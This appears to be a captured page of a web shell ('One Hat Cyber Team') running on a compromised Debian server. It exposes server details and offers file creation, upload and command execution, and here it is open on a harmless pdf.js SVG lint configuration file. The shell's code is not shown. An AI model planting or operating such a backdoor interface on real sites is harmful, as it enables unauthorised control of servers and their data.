⚝
One Hat Cyber Team
⚝
Your IP:
192.168.31.6
Server IP:
192.168.1.11
Server:
Linux pams 6.1.0-29-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.123-1 (2025-01-02) x86_64
PHP Version:
8.2.28
Buat File
|
Buat Folder
Upload File
Eksekusi
Dir :
~
/
var
/
www
/
pusaka
/
public
/
assets
/
pdfjs
/
Edit File: .svglintrc.js
export default { rules: { valid: true, custom: [ (reporter, $, ast, { filename }) => { reporter.name = "no-svg-fill-context-fill"; const svg = $.find("svg"); const fill = svg.attr("fill"); if (fill === "context-fill") { reporter.error( "Fill attribute on svg element must not be set to 'context-fill'", svg[0], ast ); } }, ], }, ignore: [ "build/**", "l10n/**", "docs/**", "node_modules/**", "external/bcmaps/**", "external/builder/fixtures/**", "external/builder/fixtures_babel/**", "external/quickjs/**", "test/tmp/**", "test/pdfs/**", "web/locale/**", "*~/**", ], };
Simpan